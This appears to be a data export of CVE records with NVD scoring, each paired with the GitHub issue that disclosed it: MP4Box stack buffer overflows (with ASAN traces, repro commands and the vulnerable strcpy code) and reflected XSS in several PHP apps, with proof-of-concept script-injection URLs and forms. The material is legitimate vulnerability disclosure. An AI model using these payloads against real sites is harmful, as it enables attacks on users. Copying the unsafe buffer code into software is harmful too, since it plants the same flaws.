[ { "source": "security@ubuntu.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/canonical/multipass/issues/2261" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/canonical/multipass/issues/2261" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:canonical:multipass:*:*:*:*:*:*:*:*", "matchCriteriaId": "DD8ABAF9-5D14-4B02-B05E-7176F870136B", "versionEndExcluding": "1.7.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.7.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "732" ]
732
https://github.com/canonical/multipass/issues/2261
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "canonical", "multipass" ]
The MacOS version of Multipass, version 1.7.0, fixed in 1.7.2, accidentally installed the application directory with incorrect owner. https://ubuntu.com/security/CVE-2021-3747 CVE-2021-3747 Thanks to Matthew Conway for the notification.
MacOS application permissions
https://api.github.com/repos/canonical/multipass/issues/2261/comments
1
2021-09-28T03:23:29Z
2021-09-28T09:25:22Z
https://github.com/canonical/multipass/issues/2261
1,009,108,060
2,261
2,640
CVE-2021-41456
2021-10-01T12:15:07.443
There is a stack buffer overflow in MP4Box v1.0.1 at src/filters/dmx_nhml.c:1004 in the nhmldmx_send_sample() function szXmlTo parameter which leads to a denial of service vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1911" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1911" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:mp4box:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "6EA6625F-CC04-42EE-8528-89C1E464604B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1911
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Step to reproduce: 1.get latest commit code (GPAC version 1.1.0-DEV-rev1221-gd626acad8-master) 2.compile with --enable-sanitizer 3.run MP4Box -add poc.nhml -new new.mp4 Env: Ubunut 20.04 , clang 12.0.1 ASAN report ``` ==344946==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe54d816f0 at pc 0x000000491bf8 bp 0x7ffe54d80610 sp 0x7ffe54d7fdd0 WRITE of size 5081 at 0x7ffe54d816f0 thread T0 #0 0x491bf7 in __interceptor_strcpy (/home/lly/pro/gpac_asan/bin/gcc/MP4Box+0x491bf7) #1 0x7fefcb5fca2d in nhmldmx_send_sample /home/lly/pro/gpac_asan/src/filters/dmx_nhml.c:1004:6 #2 0x7fefcb5fca2d in nhmldmx_process /home/lly/pro/gpac_asan/src/filters/dmx_nhml.c:1341:7 #3 0x7fefcb529997 in gf_filter_process_task /home/lly/pro/gpac_asan/src/filter_core/filter.c:2441:7 #4 0x7fefcb50b965 in gf_fs_thread_proc /home/lly/pro/gpac_asan/src/filter_core/filter_session.c:1664:3 #5 0x7fefcb50ae60 in gf_fs_run /home/lly/pro/gpac_asan/src/filter_core/filter_session.c:1901:2 #6 0x7fefcb02c708 in gf_media_import /home/lly/pro/gpac_asan/src/media_tools/media_import.c:1486:2 #7 0x526ea9 in import_file /home/lly/pro/gpac_asan/applications/mp4box/fileimport.c:1289:7 #8 0x4eb996 in do_add_cat /home/lly/pro/gpac_asan/applications/mp4box/main.c:4257:10 #9 0x4e7d46 in mp4boxMain /home/lly/pro/gpac_asan/applications/mp4box/main.c:5746:13 #10 0x7fefca2ad0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x429a4d in _start (/home/lly/pro/gpac_asan/bin/gcc/MP4Box+0x429a4d) Address 0x7ffe54d816f0 is located in stack of thread T0 at offset 4304 in frame #0 0x7fefcb5fb93f in nhmldmx_process /home/lly/pro/gpac_asan/src/filters/dmx_nhml.c:1314 ``` [poc.zip](https://github.com/gpac/gpac/files/7122999/poc.zip)
Stack-buffer-overflow in MP4Box at src/filters/dmx_nhml.c:1004 in nhmldmx_send_sample
https://api.github.com/repos/gpac/gpac/issues/1911/comments
1
2021-09-07T16:21:54Z
2021-09-09T13:04:57Z
https://github.com/gpac/gpac/issues/1911
990,150,575
1,911
2,641
CVE-2021-41457
2021-10-01T12:15:07.500
There is a stack buffer overflow in MP4Box 1.1.0 at src/filters/dmx_nhml.c in nhmldmx_init_parsing which leads to a denial of service vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1909" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1909" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:mp4box:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "AAC8DC7B-40A5-4CE7-B534-D17901AECE66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1909
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Step to reproduce: 1.get latest commit code (GPAC version 1.1.0-DEV-rev1221-gd626acad8-master) 2.compile with --enable-sanitizer 3.make 5 dirs which every of them has a large name(length=255), this makes the file's abs-path lengh larger than 1024, we called it large.nhml 4.run MP4Box -add {path to large.nhml} -new new.mp4 Env: Ubunut 20.04 , clang 12.0.1 My cmd line an ASAN report MP4Box -add ~/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/large.nhml -new new.mp4 ASAN report: ``` =336368==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc4519e5a8 at pc 0x000000491bf8 bp 0x7ffc4519e030 sp 0x7ffc4519d7f0 WRITE of size 2564 at 0x7ffc4519e5a8 thread T0 #0 0x491bf7 in __interceptor_strcpy (/home/lly/pro/gpac_asan/bin/gcc/MP4Box+0x491bf7) #1 0x7f4bfc71ad1b in nhmldmx_init_parsing dmx_nhml.c #2 0x7f4bfc7161c1 in nhmldmx_process (/home/lly/pro/gpac_asan/bin/gcc/libgpac.so.10+0xfb91c1) #3 0x7f4bfc6454f7 in gf_filter_process_task filter.c #4 0x7f4bfc6275a5 in gf_fs_thread_proc filter_session.c #5 0x7f4bfc626aa0 in gf_fs_run (/home/lly/pro/gpac_asan/bin/gcc/libgpac.so.10+0xec9aa0) #6 0x7f4bfc150959 in gf_media_import (/home/lly/pro/gpac_asan/bin/gcc/libgpac.so.10+0x9f3959) #7 0x526c94 in import_file (/home/lly/pro/gpac_asan/bin/gcc/MP4Box+0x526c94) #8 0x4eb8b6 in do_add_cat main.c #9 0x4e7c66 in mp4boxMain (/home/lly/pro/gpac_asan/bin/gcc/MP4Box+0x4e7c66) #10 0x7f4bfb3d90b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x429a4d in _start (/home/lly/pro/gpac_asan/bin/gcc/MP4Box+0x429a4d) Address 0x7ffc4519e5a8 is located in stack of thread T0 at offset 1384 in frame #0 0x7f4bfc71a56f in nhmldmx_init_parsing dmx_nhml.c This frame has 141 object(s): ``` Maybe fix for issue 1908 dose not consider this situation that there is a stack buffer overflow in nhmldmx_init_parsing
Stack buffer overflow in MP4Box at src/filters/dmx_nhml.c in nhmldmx_init_parsing
https://api.github.com/repos/gpac/gpac/issues/1909/comments
0
2021-09-07T15:26:17Z
2021-09-09T13:04:24Z
https://github.com/gpac/gpac/issues/1909
990,103,636
1,909
2,642
CVE-2021-41459
2021-10-01T12:15:07.543
There is a stack buffer overflow in MP4Box v1.0.1 at src/filters/dmx_nhml.c:1008 in the nhmldmx_send_sample() function szXmlFrom parameter which leads to a denial of service vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1912" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1912" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:mp4box:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "6EA6625F-CC04-42EE-8528-89C1E464604B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1912
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Step to reproduce: 1.get latest commit code (GPAC version 1.1.0-DEV-rev1221-gd626acad8-master) 2.compile with --enable-sanitizer 3.run MP4Box -add poc.nhml -new new.mp4 Env: Ubunut 20.04 , clang 12.0.1 ASAN report ``` ================================================================= ==345223==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffde4ab80f8 at pc 0x000000491bf8 bp 0x7ffde4ab6bb0 sp 0x7ffde4ab6370 WRITE of size 5081 at 0x7ffde4ab80f8 thread T0 #0 0x491bf7 in __interceptor_strcpy (/home/lly/pro/gpac_asan/bin/gcc/MP4Box+0x491bf7) #1 0x7f446088e9c5 in nhmldmx_send_sample /home/lly/pro/gpac_asan/src/filters/dmx_nhml.c:1008:45 #2 0x7f446088e9c5 in nhmldmx_process /home/lly/pro/gpac_asan/src/filters/dmx_nhml.c:1341:7 #3 0x7f44607bb997 in gf_filter_process_task /home/lly/pro/gpac_asan/src/filter_core/filter.c:2441:7 #4 0x7f446079d965 in gf_fs_thread_proc /home/lly/pro/gpac_asan/src/filter_core/filter_session.c:1664:3 #5 0x7f446079ce60 in gf_fs_run /home/lly/pro/gpac_asan/src/filter_core/filter_session.c:1901:2 #6 0x7f44602be708 in gf_media_import /home/lly/pro/gpac_asan/src/media_tools/media_import.c:1486:2 #7 0x526ea9 in import_file /home/lly/pro/gpac_asan/applications/mp4box/fileimport.c:1289:7 #8 0x4eb996 in do_add_cat /home/lly/pro/gpac_asan/applications/mp4box/main.c:4257:10 #9 0x4e7d46 in mp4boxMain /home/lly/pro/gpac_asan/applications/mp4box/main.c:5746:13 #10 0x7f445f53f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x429a4d in _start (/home/lly/pro/gpac_asan/bin/gcc/MP4Box+0x429a4d) Address 0x7ffde4ab80f8 is located in stack of thread T0 at offset 5432 in frame #0 0x7f446088d93f in nhmldmx_process /home/lly/pro/gpac_asan/src/filters/dmx_nhml.c:1314 ``` Different from issue 1911, the overflow memory is related to szXmlFrom parameter. The szXmlTo para has the same problem, please fix them together. Buggy code at dmx_nhml.c:1008: ``` static GF_Err nhmldmx_send_sample(GF_Filter *filter, GF_NHMLDmxCtx *ctx) { else if (!stricmp(att->name, "xmlFrom")) strcpy(szXmlFrom, att->value); else if (!stricmp(att->name, "xmlTo")) strcpy(szXmlTo, att->value); } ``` [poc.zip](https://github.com/gpac/gpac/files/7123042/poc.zip)
Stack-buffer-overflow in MP4Box at src/filters/dmx_nhml.c:1008 in nhmldmx_send_sample
https://api.github.com/repos/gpac/gpac/issues/1912/comments
0
2021-09-07T16:28:12Z
2023-11-15T08:08:21Z
https://github.com/gpac/gpac/issues/1912
990,155,594
1,912
2,643
CVE-2021-40921
2021-10-01T16:15:07.250
Cross-site scripting (XSS) vulnerability in _contactform.inc.php in Detector 0.8.5 and below version allows remote attackers to inject arbitrary web script or HTML via the cid parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dmolsen/Detector/issues/35" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dmolsen/Detector/issues/35" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:detector_project:detector:*:*:*:*:*:*:*:*", "matchCriteriaId": "1AC7909A-9A1F-4C21-8B31-A9FAEDA75918", "versionEndExcluding": null, "versionEndIncluding": "0.8.5", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/dmolsen/Detector/issues/35
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "dmolsen", "Detector" ]
**Describe the bug** Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser. This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. **To Reproduce** Steps to reproduce the behavior: 1. Go to the page with following parameter: http://[localhost]/Detector/web/templates/_contactform.inc.php?cid=%3C/textarea%3E%3Cscript%3Ealert(1);%3C/script%3E 2. Boom! **Screenshots** - Attack result ![캡처](https://user-images.githubusercontent.com/26154873/132647109-0a60ec2f-eca9-4024-bd59-f153607bb335.PNG) **Where the Issue Occurred** The code below displays the user-controlled parameter `cid` without sufficient sanitization: https://github.com/dmolsen/Detector/blob/f697794be555b4a2ce070a0b1265a1eb5f87fb58/web/templates/_contactform.inc.php#L22
[Security] XSS in _contactform.inc.php
https://api.github.com/repos/dmolsen/Detector/issues/35/comments
0
2021-09-09T08:02:29Z
2021-09-09T08:02:29Z
https://github.com/dmolsen/Detector/issues/35
991,922,568
35
2,644
CVE-2021-40922
2021-10-01T16:15:07.297
Cross-site scripting (XSS) vulnerability in install/index.php in bugs 1.8 and below version allows remote attackers to inject arbitrary web script or HTML via the last_name parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/pixeline/bugs" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pixeline/bugs/issues/552" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/pixeline/bugs" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pixeline/bugs/issues/552" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pixeline:bugs:*:*:*:*:*:*:*:*", "matchCriteriaId": "998D5E16-09A6-4821-A63A-93FB09560F4F", "versionEndExcluding": null, "versionEndIncluding": "1.8", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/pixeline/bugs/issues/552
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pixeline", "bugs" ]
**Describe the bug** Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. **To Reproduce** Steps to reproduce the behavior: 1. Go to the installation page 2. Complete the configuration including DB connection 3. Access each page of these HTML files. #### Exploit 1 - exploit `email` parameter ```HTML <html> <form method="POST" action="http://[localhost]/bugs/install/index.php"> <input name="email" value='test"/><script>alert(1)</script>'> <button>Send my greetings</button> </form> </html> ``` #### Exploit 2 - exploit `first_name` parameter ```HTML <html> <form method="POST" action="http://[localhost]/bugs/install/index.php"> <input name='first_name' value='test"/><script>alert(1)</script>'> <input name='email' value='hi'> <button>Send my greetings</button> </form> </html> ``` #### Exploit 3 - exploit `last_name` parameter ```HTML <html> <form method="POST" action="http://[localhost]/bugs/install/index.php"> <input name='last_name' value='test"/><script>alert(1)</script>'> <input name='email' value='hi'> <button>Send my greetings</button> </form> </html> ``` 4. Boom! **Screenshots** - Attack result ![캡처](https://user-images.githubusercontent.com/26154873/132655605-278db108-dab4-48cf-995f-f866ca46972d.PNG) **Where the Issue Occurred** The code below displays the user-controlled parameter `first_name`, `last_name`, and `email` without sufficient sanitization: https://github.com/pixeline/bugs/blob/f38ddb42dd89a643bd5c3f466ec9ca22cf2a9e86/install/index.php#L94 https://github.com/pixeline/bugs/blob/f38ddb42dd89a643bd5c3f466ec9ca22cf2a9e86/install/index.php#L101 https://github.com/pixeline/bugs/blob/f38ddb42dd89a643bd5c3f466ec9ca22cf2a9e86/install/index.php#L120 #### Note Note that these multiple XSS vulnerabilities exist in the tinyissue as well as in the bugs repository here.
[Security] multiple XSS in install/index.php of bugs and tinyissue
https://api.github.com/repos/pixeline/bugs/issues/552/comments
4
2021-09-09T08:57:52Z
2021-09-09T13:41:40Z
https://github.com/pixeline/bugs/issues/552
991,972,192
552
2,645
CVE-2021-40925
2021-10-01T16:15:07.427
Cross-site scripting (XSS) vulnerability in dompdf/dompdf/www/demo.php infaveo-helpdesk v1.11.0 and below allow remote attackers to inject arbitrary web script or HTML via the $_SERVER["PHP_SELF"] parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ladybirdweb/faveo-helpdesk" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ladybirdweb/faveo-helpdesk/issues/5423" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ladybirdweb/faveo-helpdesk" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ladybirdweb/faveo-helpdesk/issues/5423" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:faveohelpdesk:faveo:*:*:*:*:*:*:*:*", "matchCriteriaId": "0B7D673E-E592-4AE6-959E-B0758C5F7C69", "versionEndExcluding": null, "versionEndIncluding": "1.11.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/ladybirdweb/faveo-helpdesk/issues/5423
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ladybirdweb", "faveo-helpdesk" ]
- Faveo Version : v1.11.0 and below versions - PHP version : 7.1.33 - Database Driver & Version : MySQL 5.5.62 - Server specification : Apache 2.4.29, Turn on the AcceptPathInfo in apache2.conf #### Description: Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser. This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. #### Steps To Reproduce: 1. Go to the http://[localhost]/faveo-helpdesk/vendor/dompdf/dompdf/www/index.php 2. Login 3. Go tot the page with the following link: http://[localhost]/faveo-helpdesk/vendor/dompdf/dompdf/www/demo.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E 4. Boom! **Where the Issue Occurred** The code below displays the user-controlled input `PHP_SELF` in `demo.php` without sufficient sanitization: https://github.com/ladybirdweb/faveo-helpdesk/blob/4752081caff32ce8c378fd97ba5525aabd94c8f7/vendor/dompdf/dompdf/www/demo.php#L35 **Note** Although the dompdf page is accessible from localhost, it can be attacked if the localhost user clicks on the aforementioned link. #### Downloaded from - [*] master-branch - [*] release-tag: v1.11.0
[Security] XSS in dompdf/dompdf/www/demo.php
https://api.github.com/repos/faveosuite/faveo-helpdesk/issues/5423/comments
3
2021-09-10T02:01:59Z
2023-05-25T06:26:09Z
https://github.com/faveosuite/faveo-helpdesk/issues/5423
992,815,925
5,423
2,646
CVE-2021-40926
2021-10-01T16:15:07.473
